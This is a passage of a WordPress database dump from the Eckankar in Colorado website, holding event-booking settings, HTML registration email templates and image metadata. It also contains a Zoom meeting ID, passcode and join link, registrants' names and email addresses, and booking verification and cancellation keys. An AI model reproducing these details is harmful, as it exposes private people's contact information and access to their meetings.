registering!</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 20px;\">You are signed up for the following online event:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b><span style=\"color: #f28a27;\">Title: </span>%%event_title%%</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Date: </b>%%event_start_date%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Time: </b>%%event_start_time%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 15px;\"> </p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px; color: #f28a27;\"><b>Zoom Login Information:</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b>Meeting ID: </b>834 9746 0655<br />\r\n<b>Passcode:</b> 867156</p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><a href=\"https://us02web.zoom.us/j/83497460655?pwd=QUhmSC9NZHg1YlVwZWFtc0JjZDEzdz09\">https://us02web.zoom.us/j/83497460655?pwd=QUhmSC9NZHg1YlVwZWFtc0JjZDEzdz09</a></p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><b>Dial-in number: </b>720-707-2699 (for those who need to join by phone)</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">See you there!</p>\r\n</div>\r\n<p><!-- [if mso]>\r\n                </td>\r\n</tr>\r\n</table>\r\n<p>                <![endif]--></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado</a> website. If you have any questions regarding the origin of this email, please feel free to get in touch, we\'re always happy to help out.</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span><br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:22:\"New Event Registration\";s:7:\"content\";s:4812:\"<p>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</p>\r\n<p>&nbsp;</p>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><strong><span style=\"color: #1d5791; font-family: arial, helvetica, sans-serif; font-size: 36px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto;\">Admin Notification</span></strong></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #707172; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>New Event Registration</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\"><span style=\"font-size: 20px; color: #333333;\"><strong>A new registration has been submitted for the following event:</strong></span></div>\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\"><br />\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>%%event_title%%</strong></span></div>\r\n<div></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Date: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_date%%</strong></span></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Time: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_time%%</strong></span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid rgba(201, 201, 207, 0.35); border-top-color: rgba(201, 201, 207, 0.35); border-right-color: rgba(201, 201, 207, 0.35); border-left-color: rgba(201, 201, 207, 0.35); text-align: left;\"><span style=\"font-size: 14pt;\">%%attendees_full_info%%</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}}'),(160019,266568,'mec_event_status','EventScheduled'),(160020,266568,'mec_moved_online_link',''),(160021,266568,'mec_cancelled_reason',''),(160022,266568,'mec_display_cancellation_reason_in_single_page',''),(160023,266568,'protect_children',''),(160024,266568,'passster_activate_global_protection',NULL),(160025,266568,'passster_activate_protection',NULL),(160026,266568,'passster_protection_type','password'),(160027,266568,'boldgrid_hide_page_title','0'),(160028,266568,'_oembed_ace4d65561aa575fe8833c60d61f4161','{{unknown}}'),(160029,266568,'boldgrid_in_page_containers','1'),(160032,266568,'_dp_original','266540'),(160031,266568,'_thumbnail_id','266569'),(160033,266568,'_edit_lock','1651331835:2'),(160034,266568,'_edit_last','2'),(160035,266569,'_wp_attached_file','2022/04/ELSS_SpirtualSurrender.webp'),(160036,266569,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:676;s:6:\"height\";i:380;s:4:\"file\";s:35:\"2022/04/ELSS_SpirtualSurrender.webp\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"ELSS_SpirtualSurrender-300x169.webp\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/webp\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"ELSS_SpirtualSurrender-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:35:\"ELSS_SpirtualSurrender-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:35:\"ELSS_SpirtualSurrender-474x324.webp\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/webp\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:35:\"ELSS_SpirtualSurrender-391x260.webp\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/webp\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:35:\"ELSS_SpirtualSurrender-300x380.webp\";s:5:\"width\";i:300;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/webp\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(160037,266569,'smush-info','Failed with error code invalid_file_type - /home/eckank5/public_html/wp-content/uploads/2022/04/ELSS_SpirtualSurrender.webp - cannot be optimized, it has an invalid file type'),(160038,266569,'smush-complete',''),(160039,266567,'smush-info','Failed with error code invalid_file_type - /home/eckank5/public_html/wp-content/uploads/2022/04/HUSOS.webp - cannot be optimized, it has an invalid file type'),(160040,266567,'smush-complete',''),(161763,266688,'protect_children',''),(161764,266688,'mec_color',''),(160067,266572,'_field_530','Michael'),(160068,266572,'_field_531','Murphy'),(160069,266572,'_field_532','murphymw@springsips.com'),(160070,266572,'_field_535',''),(160071,266572,'_form_id','56'),(160072,266572,'_seq_num','5'),(160147,266575,'mec_color',''),(160128,266573,'mec_event_status','EventScheduled'),(160129,266573,'mec_moved_online_link',''),(160130,266573,'mec_cancelled_reason',''),(160131,266573,'mec_display_cancellation_reason_in_single_page',''),(160132,266573,'protect_children',''),(160133,266573,'passster_activate_global_protection',NULL),(160134,266573,'passster_activate_protection',NULL),(160135,266573,'passster_protection_type','password'),(160136,266573,'boldgrid_hide_page_title','0'),(160137,266573,'_thumbnail_id','266472'),(160138,266573,'_oembed_ace4d65561aa575fe8833c60d61f4161','{{unknown}}'),(160139,266573,'boldgrid_in_page_containers','1'),(160141,266573,'_dp_original','266545'),(160142,266573,'_edit_lock','1650684306:2'),(160143,266573,'_edit_last','2'),(161923,266692,'_field_496','Yusuf'),(161924,266692,'_field_497','Nyle'),(160148,266575,'mec_location_id','122'),(160149,266575,'mec_dont_show_map','0'),(160150,266575,'mec_organizer_id','1'),(160151,266575,'mec_read_more',''),(160152,266575,'mec_more_info',''),(160153,266575,'mec_more_info_title',''),(160154,266575,'mec_more_info_target','_self'),(160155,266575,'mec_cost',''),(160156,266575,'mec_currency','a:0:{}'),(160157,266575,'mec_additional_organizer_ids','a:0:{}'),(160158,266575,'mec_additional_location_ids','a:0:{}'),(160159,266575,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-05-22\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-05-22\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(160160,266575,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(160161,266575,'mec_certain_weekdays','a:0:{}'),(160162,266575,'mec_allday','0'),(160163,266575,'one_occurrence','0'),(160164,266575,'mec_hide_time','0'),(160165,266575,'mec_hide_end_time','0'),(160166,266575,'mec_comment',''),(160167,266575,'mec_timezone','global'),(160168,266575,'mec_countdown_method','global'),(160169,266575,'mec_public','1'),(160170,266575,'mec_start_date','2022-05-22'),(160171,266575,'mec_start_time_hour','10'),(160172,266575,'mec_start_time_minutes','30'),(160173,266575,'mec_start_time_ampm','AM'),(160174,266575,'mec_start_day_seconds','37800'),(160175,266575,'mec_end_date','2022-05-22'),(160176,266575,'mec_end_time_hour','11'),(160177,266575,'mec_end_time_minutes','30'),(160178,266575,'mec_end_time_ampm','AM'),(160179,266575,'mec_end_day_seconds','41400'),(160180,266575,'mec_repeat_status','0'),(160181,266575,'mec_repeat_type',''),(160182,266575,'mec_repeat_interval','1'),(160183,266575,'mec_repeat_end',''),(160184,266575,'mec_repeat_end_at_occurrences',''),(160185,266575,'mec_repeat_end_at_date',''),(160186,266575,'mec_advanced_days','a:0:{}'),(160187,266575,'mec_in_days',''),(160188,266575,'mec_not_in_days',''),(160189,266575,'mec_hourly_schedules','a:0:{}'),(160190,266575,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(160191,266575,'mec_tickets','a:0:{}'),(160192,266575,'mec_fees_global_inheritance','1'),(160193,266575,'mec_fees','a:0:{}'),(160194,266575,'mec_ticket_variations_global_inheritance','1'),(160195,266575,'mec_ticket_variations','a:0:{}'),(160196,266575,'mec_reg_fields_global_inheritance','1'),(160197,266575,'mec_reg_fields','a:0:{}'),(160198,266575,'mec_bfixed_fields','a:0:{}'),(160199,266575,'mec_op','a:0:{}'),(160200,266575,'mec_fields','a:0:{}'),(160201,266575,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(160202,266575,'mec_event_status','EventScheduled'),(160203,266575,'mec_moved_online_link',''),(160204,266575,'mec_cancelled_reason',''),(160205,266575,'mec_display_cancellation_reason_in_single_page',''),(160206,266575,'protect_children',''),(160207,266575,'passster_activate_global_protection',NULL),(160208,266575,'passster_activate_protection',NULL),(160209,266575,'passster_protection_type','password'),(160210,266575,'boldgrid_hide_page_title','0'),(160211,266575,'_thumbnail_id','266077'),(160214,266575,'_dp_original','266311'),(160213,266575,'boldgrid_in_page_containers','1'),(160215,266575,'_edit_lock','1651352710:2'),(160216,266575,'_edit_last','2'),(160217,266576,'mec_color',''),(160218,266576,'mec_location_id','122'),(160219,266576,'mec_dont_show_map','0'),(160220,266576,'mec_organizer_id','1'),(160221,266576,'mec_read_more',''),(160222,266576,'mec_more_info',''),(160223,266576,'mec_more_info_title',''),(160224,266576,'mec_more_info_target','_self'),(160225,266576,'mec_cost',''),(160226,266576,'mec_currency','a:0:{}'),(160227,266576,'mec_additional_organizer_ids','a:0:{}'),(160228,266576,'mec_additional_location_ids','a:0:{}'),(160229,266576,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-06-26\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-06-26\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(160230,266576,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(160231,266576,'mec_certain_weekdays','a:0:{}'),(160232,266576,'mec_allday','0'),(160233,266576,'one_occurrence','0'),(160234,266576,'mec_hide_time','0'),(160235,266576,'mec_hide_end_time','0'),(160236,266576,'mec_comment',''),(160237,266576,'mec_timezone','global'),(160238,266576,'mec_countdown_method','global'),(160239,266576,'mec_public','1'),(160240,266576,'mec_start_date','2022-06-26'),(160241,266576,'mec_start_time_hour','10'),(160242,266576,'mec_start_time_minutes','30'),(160243,266576,'mec_start_time_ampm','AM'),(160244,266576,'mec_start_day_seconds','37800'),(160245,266576,'mec_end_date','2022-06-26'),(160246,266576,'mec_end_time_hour','11'),(160247,266576,'mec_end_time_minutes','30'),(160248,266576,'mec_end_time_ampm','AM'),(160249,266576,'mec_end_day_seconds','41400'),(160250,266576,'mec_repeat_status','0'),(160251,266576,'mec_repeat_type',''),(160252,266576,'mec_repeat_interval','1'),(160253,266576,'mec_repeat_end',''),(160254,266576,'mec_repeat_end_at_occurrences',''),(160255,266576,'mec_repeat_end_at_date',''),(160256,266576,'mec_advanced_days','a:0:{}'),(160257,266576,'mec_in_days',''),(160258,266576,'mec_not_in_days',''),(160259,266576,'mec_hourly_schedules','a:0:{}'),(160260,266576,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(160261,266576,'mec_tickets','a:0:{}'),(160262,266576,'mec_fees_global_inheritance','1'),(160263,266576,'mec_fees','a:0:{}'),(160264,266576,'mec_ticket_variations_global_inheritance','1'),(160265,266576,'mec_ticket_variations','a:0:{}'),(160266,266576,'mec_reg_fields_global_inheritance','1'),(160267,266576,'mec_reg_fields','a:0:{}'),(160268,266576,'mec_bfixed_fields','a:0:{}'),(160269,266576,'mec_op','a:0:{}'),(160270,266576,'mec_fields','a:0:{}'),(160271,266576,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(160272,266576,'mec_event_status','EventScheduled'),(160273,266576,'mec_moved_online_link',''),(160274,266576,'mec_cancelled_reason',''),(160275,266576,'mec_display_cancellation_reason_in_single_page',''),(160276,266576,'protect_children',''),(160277,266576,'passster_activate_global_protection',NULL),(160278,266576,'passster_activate_protection',NULL),(160279,266576,'passster_protection_type','password'),(160280,266576,'boldgrid_hide_page_title','0'),(160281,266576,'_thumbnail_id','266577'),(160284,266576,'_dp_original','266311'),(160283,266576,'boldgrid_in_page_containers','1'),(160285,266576,'_edit_lock','1650731972:2'),(160286,266576,'_edit_last','2'),(160287,266577,'_wp_attached_file','2022/04/karma-1.jpg'),(160288,266577,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:715;s:6:\"height\";i:381;s:4:\"file\";s:19:\"2022/04/karma-1.jpg\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"karma-1-300x160.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"karma-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:19:\"karma-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:19:\"karma-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:19:\"karma-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:19:\"karma-1-300x381.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:381;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(160289,266577,'original-file','2022/04/karma-1-updraft-pre-smush-original.jpg'),(160290,266577,'smush-complete','1'),(160291,266577,'smush-info','The file was compressed from 113.48 KB to 106.73 KB saving 5.94 percent using WP-Optimize'),(160292,266577,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:116202;s:12:\"smushed-size\";i:109294;s:15:\"savings-percent\";d:5.94000000000000039079850466805510222911834716796875;s:10:\"sizes-info\";a:7:{s:4:\"full\";a:2:{s:8:\"original\";i:116202;s:10:\"compressed\";i:109294;}s:6:\"medium\";a:2:{s:8:\"original\";i:18683;s:10:\"compressed\";i:18198;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:9749;s:10:\"compressed\";i:9683;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:33402;s:10:\"compressed\";i:32443;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:54627;s:10:\"compressed\";i:52869;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:37506;s:10:\"compressed\";i:36364;}s:8:\"tileview\";a:2:{s:8:\"original\";i:47028;s:10:\"compressed\";i:45109;}}}'),(161197,266644,'mec_user_id','1000004'),(161196,266644,'mec_transaction_id','XLS29928'),(160375,266589,'_field_530','Deo'),(160376,266589,'_field_531','Hobbs'),(160377,266589,'_field_532','deohobbs1@gmail.com'),(160378,266589,'_field_535','Vicki Cashman asked me to host for an hour during the Chela meeting and then I can help do whatever needed after that! Thank you for organizing this and I look forward to being there! '),(160379,266589,'_form_id','56'),(160380,266589,'_seq_num','6'),(160631,266607,'mec_price','0'),(160632,266607,'mec_gateway','MEC_gateway_free'),(160633,266607,'mec_gateway_label','Free'),(160634,266608,'mec_transaction_id','UXS95594'),(160635,266608,'mec_user_id','1000001'),(160636,266608,'mec_verified','1'),(160637,266608,'mec_verification_key','2629b79c05e2aa494a18be351b61a47d'),(160638,266608,'mec_cancellation_key','dcf779985314610669b1d70c978ac742'),(160639,266608,'mec_confirmed','1'),(160640,266608,'mec_event_id','266568'),(160641,266608,'mec_date','1652005800:1652052600'),(160642,266608,'mec_ticket_id',',1,'),(160643,266608,'mec_booking_time','2022-05-01 05:36:30'),(160644,266608,'mec_all_dates','a:0:{}'),(160645,266608,'mec_other_dates','a:0:{}'),(160646,266608,'mec_attention_time','1652005800:1652052600'),(160647,266608,'mec_attention_time_start','1652005800'),(160648,266608,'mec_attention_time_end','1652052600'),(160649,266608,'mec_book_date_submit','20220501053630'),(160650,266608,'mec_booking_location','129'),(160651,266608,'mec_ticket_price_1','0'),(160652,266608,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:20:\"kellywinfo@gmail.com\";s:4:\"name\";s:13:\"Kelly Walker 